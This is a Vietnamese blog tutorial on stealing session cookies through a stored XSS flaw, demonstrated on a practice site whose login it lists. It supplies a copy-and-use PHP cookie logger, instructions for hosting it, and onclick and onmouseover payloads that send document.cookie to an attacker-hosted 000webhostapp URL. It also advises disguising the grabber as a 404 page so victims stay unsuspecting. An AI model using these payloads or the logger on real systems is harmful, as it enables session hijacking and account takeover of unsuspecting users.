Trang Chủ Blog
Đăng ký Linode nhận ngay $100 Credit Free
angle-down angle-left angle-right angle-up bill-momo Asset 1 Asset 1 chat close Asset 1 creditcard dollar-circle dollar-phone dot-matrix endow entertainment facebook-circle entertainment Asset 1 gift-momo gift handshake hotline invoice license Asset 1 Asset 1 Asset 1 Asset 1 svg-note phone-circle Asset 1 Asset 1 Asset 1 search setting shopping-bag Asset 1 Asset 1 Asset 1 truck Asset 1

Đánh cắp Cookie bằng cách lợi dụng lỗi bảo mật XSS

Đánh cắp Cookie bằng cách lợi dụng lỗi bảo mật XSS

Thông thường khi tạo TC cho một textbox ta sẽ có một case để check lổ hổng bảo mật XSS như bên dưới:

  • Nhập đoạn test script sau vào textbox : <script>alert(“xss error”) </script>
  • Xác nhận rằng script sẽ không được thực thi, không xuất hiện alert pop-up với nội dung "xss error"

1. Một code đánh cắp cookie:

Khá là nhiều khi bạn tìm với keyword "cookie stealer" , sau nhiều lần tìm kiếm và thử nghiệm thì mình tìm được 1 đoạn code viết bằng php chạy hiệu quả như bên dưới, lấy xài luôn nhé 

<?php
    $cookie = $_GET["c"];
    $file = fopen('logs.txt', 'a');
    fwrite($file, $cookie . "\n\n");
    
?>

Copy vào notepad++ và save với extension php nhé ( ex: xssError.php ), ý nghĩa đoạn code trên chỉ là lấy cookie xong ghi vào file logs.txt thôi, tùy vào nội dung đoạn code mà mình có thể lấy được nhiều thông tin hơn như IP address, port number, user agent …. .

  • Như vậy mình có 2 file: xssError.php (thực thi) - Logs.txt (Chứa cookie)

2. Cần có một free Web hosting service

Web hosting service để chứa 2 file trên, sài free thôi nhé, mọi người có thể sử dụng https://www.000webhost.com nhé, ngon + bổ + rẻ 

  • Lưu ý: Bạn có thể sign-up nhanh bằng account Gmail

3. Nạn nhân để thực hành lổ hổng bảo mật XSS : http://www.techpanda.org/index.php

Account: [email protected] / Password2010

Đây là trang được tạo ra để thực hành thử nghiệm XSS nhé. Sau khi đến Dashboard thì tạo record mới như bên dưới

  1. Click Add New Contact
  2. Nhập đoạn script bên dưới vào ô First name
<a href=# onclick=\"document.location=\'https://imploratory-carload.000webhostapp.com/XSSError.php?c=\'+escape\(document.cookie\)\;\">XSSError</a>

Ngoài thao tác click thì ta có thể chèn script với thao tác onmouseover

<a onmouseover=\"document.location=\'https://imploratory-carload.000webhostapp.com/XSSError.php?c=\'+escape\(document.cookie\)\;\">XSSError</a>

Với đoạn script trên thì chỉ cần người dùng di chuyển mouse đến đoạn text XSSError thì cũng có thể bị mất cookie rồi.

  • Ngoài ra còn nhiều kiểu để chèn script đánh cắp cookie nữa mình sẽ bổ sung dần cho mọi người .

https://imploratory-carload.000webhostapp.com/XSSError.php << đây là link đường dẫn file XSSError.php mà mình upload ở phần 2, First name bây giờ sẽ hiển thị dưới dạng Hyperlink là XSSError , khi người dùng click vào thì sẽ chuyển đến trang php có đoạn code đánh cắp cookie ở trên, dĩ nhiên hiện tại mình chỉ demo đánh cắp cookie thôi nên nạn nhân sẽ thấy hiển thị 1 trang blank khá thô thiển ) một số hacker có thể ngụy trang bằng cách hiển thị dưới dạng một đường link 404 – Page not found và một link di chuyển về Homepage để nạn nhân tiếp tục sử dụng mà không nghi ngờ mình đã bị đánh cắp cookie

Theo happy path thì ta sẽ có một nạn nhân ngờ nghệch click vào hyperlink trên, đến file logs để thu hoạch thôi : https://imploratory-carload.000webhostapp.com/logs.txt

Ta sẽ có được cookie là PHPSESSID của nạn nhân

via Viblo

DCOneService là blog cá nhân cung cấp thông tin chia sẽ lập trình, cung cụ tools tự động, coupon giảm giá dành cho Tên miền, Hosting, VPS/Server.